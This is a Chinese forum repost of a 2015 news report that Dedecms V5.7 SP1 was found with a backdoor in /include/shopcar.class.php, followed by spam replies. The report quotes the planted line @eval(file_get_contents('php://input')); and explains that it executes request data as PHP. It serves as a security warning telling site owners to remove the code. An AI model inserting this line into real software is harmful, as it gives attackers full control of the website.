返回列表 发新帖

Dedecms被曝疑似植入后门 可成功控制网站

433.8k 13
kjeittccdf 发表于 2015-3-30 15:29:10|湖北 | 查看全部 阅读模式
站长之家(Chinaz.com)3月21日报道:昨日,乌云漏洞平台发布最新报告称,著名开源建站软件Dedecms V5.7  SP1正式版被植入后门,通过该后门可成功入侵并控制使用dedecms的网站。
7 I4 r0 }4 M. w2 Z# p4 I9 f

Dedecms被曝植入后门代码

Dedecms被曝植入后门代码

. c+ s3 l" s+ ?! v8 x" s: d
Dedecms被曝植入后门(站长之家配图)
6 S! P1 H! T1 d$ y) I4 X# O% l* M+ m
据乌云报告,被植入的后门是在/include/shopcar.class.php文件中,被植入的代码为@eval(file_get_contents(‘php://input’));,乌云介绍称,通过该后门可成功入侵dedecms网站。有网友对植入的该后门予以证实,称其在2012-3-18  19:08下载的DedeCMS-V5.7-UTF8-SP1.tar.gz 有此代码。3 Y7 Z" J1 {4 i6 n' O4 P; Y
据了解,@eval(file_get_contents(‘php://input’));是将请求的数据流作为脚本语言执行,通过该后门,可以上传PHP后门来控制整个网站。使用Dedecms V5.7 SP1正式版建站的站长,需立即对后门代码进行删除,以保护网站安全。& z- s- L2 X  f& \! b. ^  m/ U
Dedecms是一款开源建站软件,其最早是由IT柏拉图个人开发,并在2007年进行了公司化运作。目前,国内有不少网站都使用了Dedecms系统,不过在Dedecms创始人IT柏拉图的离开后,Dedecms屡次被曝出安全漏洞问题。截至发稿,Dedecms官方尚未对该漏洞进行任何回应。

回复|共 13 个

wwzcdenleclv 发表于 2015-11-30 19:41:55|美国 | 查看全部
疯了 这年头盗版还真多~~~~~~
Acropozelan 发表于 2015-11-30 19:42:36|美国 | 查看全部
本人在此留言均为网络上复制,用于检验本人电脑键盘录入、屏幕显示的机械、光电性能。并不代表本人局部或全部同意、支持或者反对楼主观点。
wwzcdenleclv 发表于 2015-11-30 19:42:40|法国 | 查看全部
都看了,这帖子有意思。
wwzcdenleclv 发表于 2015-11-30 19:43:21|美国 | 查看全部
挨骂也是幸福~~~
wwzcdenleclv 发表于 2015-11-30 19:43:31|拉美地区 | 查看全部
我的我的 忘记了 呵呵
Acropozelan 发表于 2016-1-26 21:23:48|阿尔及利亚 | 查看全部
哈哈~` 你好有意思哦~
mwxny 发表于 2016-1-26 21:24:05|美国 | 查看全部
我又回复了
tohme 发表于 2016-1-26 21:24:09|印度 | 查看全部
看到本ID的这位童鞋,我看你气度不凡,谈吐间隐隐有王者之气,日后必有一番作为! 内有“加关注”三字,你就顺手把它点了吧。相得准,我分文不收;相不准,你也好回来找我。
Acropozelan 发表于 2016-1-26 21:24:52|美国 | 查看全部
…没我说话的余地…飘走
gevaemaidovef 发表于 2017-4-10 22:22:06|保加利亚 | 查看全部
哈哈 瞧你说的~~~
alapScady 发表于 2017-4-10 22:24:56|美国 | 查看全部
呵呵,等着就等着....
bqtklouu 发表于 2017-4-10 22:25:28|美国 | 查看全部
苍天之下,厚土之上,竟有如此奇人异士、文人墨客!讥讽于谈笑间,笑骂于无形中,层次之高,境界之深,非我等所能匹及,偶像啊!
Mqokjdvq 发表于 2017-4-10 22:25:59|Reserved | 查看全部
这是怎么了啊??

回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

得知互动是一个融创意、设计、开发、营销、生活、互联网于一体的专业交流分享平台。
Copyright © 2026 站长技术交流论坛|互联网技术交流平台|Ai技术交流平台 版权所有 All Rights Reserved. Powered by Discuz! X5.0 鄂ICP备15006301号-5|鄂公网安备 42018502006730号
关灯 在本版发帖 扫一扫添加QQ客服 返回顶部
快速回复 返回顶部 返回列表